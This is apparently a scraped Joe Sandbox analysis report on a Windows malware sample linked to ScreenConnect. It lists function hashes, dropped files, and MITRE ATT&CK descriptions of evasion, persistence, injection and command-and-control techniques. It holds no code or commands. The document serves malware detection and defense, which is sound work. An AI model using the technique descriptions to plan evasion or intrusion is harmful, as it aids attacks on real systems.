Opcode Fuzzy Hash: 238dd416fb04cc52b4b9c4583b44d88c33f13d3baccdd2602fc5caa6d96a8612
Instruction Fuzzy Hash: 5B41E52A64D2951FD712AB6CE8B64EA3FA4DF9723970901F7D1C8CB0A3C90C584B8761

Function 00007FFD34967ADB Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729d30b00e7dc3e9b99fb0ff101b420875e70270ff826011e9caee174dc22ec0
Instruction ID: 26211dfba5546e0735b6ca6fa03236ac5b11012b65a94482669d88573ea84be4
Opcode Fuzzy Hash: 729d30b00e7dc3e9b99fb0ff101b420875e70270ff826011e9caee174dc22ec0
Instruction Fuzzy Hash: 62312471B1CB8A4FEB99EB6898A52F57791EF56324B5000FED14DC3286DE1CB8468390

Function 00007FFD34968309 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3a27a8b0e0297a6035575feafd6c6e866b07989e2ac6f3e1369b23d572bc02
Instruction ID: fd208edcf76e41ed4ca9aa6ede659d08acc0f1b69e2ae49a5df954fa2a3d9c8d
Opcode Fuzzy Hash: 6b3a27a8b0e0297a6035575feafd6c6e866b07989e2ac6f3e1369b23d572bc02
Instruction Fuzzy Hash: 56312673F0EA494BDB96D72858711E83B91EF46334F0900EFE24DD3196DA2DA8019352

Function 00007FFD34967F08 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32406a6cf0e53c1c7a77a727e40b33230e1242b4fc945e68873168f5a0240488
Instruction ID: b241c6b4a021996b0b81274779829b561b7fd5782ebcca652647a732034d1f4b
Opcode Fuzzy Hash: 32406a6cf0e53c1c7a77a727e40b33230e1242b4fc945e68873168f5a0240488
Instruction Fuzzy Hash: 2231F532F4D9498BEB54DA58ACA08E877D1EF99324F1401BEE14DD31A6DB2CA802C751

Function 00007FFD34967FBA Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d135f7dfe0f6692582ee0e1ac210bf59189d9ec40886e03411745990677c673d
Instruction ID: c063e01ed71fe6634e7a8238451c74b1d7c3915cb58e41174c0eb39410832186
Opcode Fuzzy Hash: d135f7dfe0f6692582ee0e1ac210bf59189d9ec40886e03411745990677c673d
Instruction Fuzzy Hash: 2E214831A0DB894FD7A5DB7498A14A57BE0FF96334B0406FED08DC3196DA2CA802C361

Function 00007FFD34964B49 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388fce4c235cb3be9dada8191887f58391b86c0baa1623bb2aa0c76bfc8e592b
Instruction ID: 6c06d006e8c70e5f97098353d90c185eceede4ba850764b92319e68821963ef5
Opcode Fuzzy Hash: 388fce4c235cb3be9dada8191887f58391b86c0baa1623bb2aa0c76bfc8e592b
Instruction Fuzzy Hash: B421D33270CE064EEF94EA68E8929F973D0EB52330740013EE58EC358BDD1DF8469685

Function 00007FFD34964D4D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fef3c23a260c032b087c8b82fda60628d1886edc778242dc6d54dad783664bfc
Instruction ID: 1d7b7c7d78ffc6292d7b077229e0bdbdff3b2d550968ed2b0b92ff064d8fa82f
Opcode Fuzzy Hash: fef3c23a260c032b087c8b82fda60628d1886edc778242dc6d54dad783664bfc
Instruction Fuzzy Hash: C111A272E0DA489BDF819BA858B41E87FE0EF56314B05009ED199D3196DB28A401DB09

Function 00007FFD34964249 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4587b832275e8aa66a932a5be993177e3437e502223d5bacfe33e6f17d5b5d40
Instruction ID: 8e9eed15f85982b7f9f3de15cfd1bcdd01e4482598bfbce955ec9ed4362808bb
Opcode Fuzzy Hash: 4587b832275e8aa66a932a5be993177e3437e502223d5bacfe33e6f17d5b5d40
Instruction Fuzzy Hash: FA11E314B0CA574AF769926944F13B52BE19F83320F2981BEC50DC21DADC2C9C85A351

Function 00007FFD34962397 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293f6751e589cc893f2890d892d17ecd0be645a80130ee8338d59a0d9cc1a959
Instruction ID: 373df2450a76c2bf97a9d0aefbff372a890b327a8522c7ec49c3eca666d80bc2
Opcode Fuzzy Hash: 293f6751e589cc893f2890d892d17ecd0be645a80130ee8338d59a0d9cc1a959
Instruction Fuzzy Hash: 38115E61B099064FDB94EF28C0A4B6577D1FF69324B5441BCD88EDF28ACE2DE8418790

Function 00007FFD34962400 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4ad11793576d45651ce4fd438bba4e256acca4e1d81f2e6ab1ef9fa91ce61b
Instruction ID: 2ec1d0c330c78cdd1540a5e2cbc29f7352dbf22934ea45144ceb50e62d929e68
Opcode Fuzzy Hash: 0e4ad11793576d45651ce4fd438bba4e256acca4e1d81f2e6ab1ef9fa91ce61b
Instruction Fuzzy Hash: 6D116071B099464FDB84EF28C0A4B6577D1FF69324B5440ACD48EDF28ACE3DE8418780

Function 00007FFD349635C9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c69a68c50789735ec0d4fe10a3634dacfaedc86d4dcda24bee5d49fa9ca2d3
Instruction ID: 166c2cb2a401a513a5a68d3843311bd4aff578ca8293359f1a5e95d0666da5bc
Opcode Fuzzy Hash: 20c69a68c50789735ec0d4fe10a3634dacfaedc86d4dcda24bee5d49fa9ca2d3
Instruction Fuzzy Hash: E9F0653550C69C9FCF52DB68D4A18D67FB0EE17320B0501CBE149CB053EB259A56CBC2

Function 00007FFD34960521 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b3e6675b81993d3d4362f6dc770dcb061e4dce18791d743b652015097eebcf
Instruction ID: e785f1bd2e1ba9a4b20f97d845354735c4c6e97cb8d4661963093fceef723a6b
Opcode Fuzzy Hash: 19b3e6675b81993d3d4362f6dc770dcb061e4dce18791d743b652015097eebcf
Instruction Fuzzy Hash: 09E0D82114E3D50FDB579B3484998E53FA0DD1322030940EFD581CF0B3E618C549D792

Function 00007FFD34960F28 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28950ee09a6a3d981ceb5b190376077784a4e63acfc4ed956c07578abdd001dd
Instruction ID: 644119fbf4e7d0c6d880a88cbbe111fb3e15f3938cebb6d761311de9ddb5f763
Opcode Fuzzy Hash: 28950ee09a6a3d981ceb5b190376077784a4e63acfc4ed956c07578abdd001dd
Instruction Fuzzy Hash: 1EE04F3150850C9FCB11EB68E451CEA7764EF16319B00019BE00DC7052DA26A954CBC1

Function 00007FFD34964260 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f367508889fd6d86ecb21524ea22e10f215ddde5e62bc7b7efdcae6e36801499
Instruction ID: 48086d6ea545039d76d58a793d5713f8c79b95c49b3c11ecd660059577dc967f
Opcode Fuzzy Hash: f367508889fd6d86ecb21524ea22e10f215ddde5e62bc7b7efdcae6e36801499
Instruction Fuzzy Hash: 25E08C15A4C61B42FB6C22A668E13F960808F06321F1940BED50EC14CDCC5C9CC4A1A6

Function 00007FFD34967D3A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a60f5b2908a8f3233733a457a5c015f7bb26af3825eab931be3dd6e03a6dc2
Instruction ID: 45b9c8a3748013bfa79177b837f9ada0095394da5804cc2e5d618f3edd3f317a
Opcode Fuzzy Hash: 96a60f5b2908a8f3233733a457a5c015f7bb26af3825eab931be3dd6e03a6dc2
Instruction Fuzzy Hash: 7ED0C742B0DC6D0BA9D5A11C38A51F856C1D7DD670B5444BBE50DC628DDD0C9CD22380

Function 00007FFD3496249F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaada2f66d463ee5e37cc548eafadd53be47304c2c729b856b7cc819f2d62bb2
Instruction ID: 40f2fad86fbcfe37fb585d9c038150866cb5689ff7ed3530e4186e5bab2c750d
Opcode Fuzzy Hash: aaada2f66d463ee5e37cc548eafadd53be47304c2c729b856b7cc819f2d62bb2
Instruction Fuzzy Hash: 66C09B10F1855746F195FF3484F51FD11526F89214B904475D10DC118ACD3CB5017545

Function 00007FFD349621E1 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2239423d273d9a2cd5767877b14d01e59f07f90498b224b4116c114f4ce162
Instruction ID: 544a21c5859edb60c4cf6f22086c30b3d90784ae0050b76f9913a45ccf30f2fd
Opcode Fuzzy Hash: 6e2239423d273d9a2cd5767877b14d01e59f07f90498b224b4116c114f4ce162
Instruction Fuzzy Hash: 0DA00210F0D92745A0A2AD6400A61BD00410F56620A704179D24DC119ACD2CA94271A7

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mrKs8EKXbz.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mrKs8EKXbz.exe_521cdd52a6fecd7688fcd95b479bab4279f873c5_70ec60d9_0d489e28-b0d3-456e-8b7e-ac7fad451ec2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3946.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AED.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B1D.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B3A.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B89.tmp.txt

Windows Analysis Report
mrKs8EKXbz.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre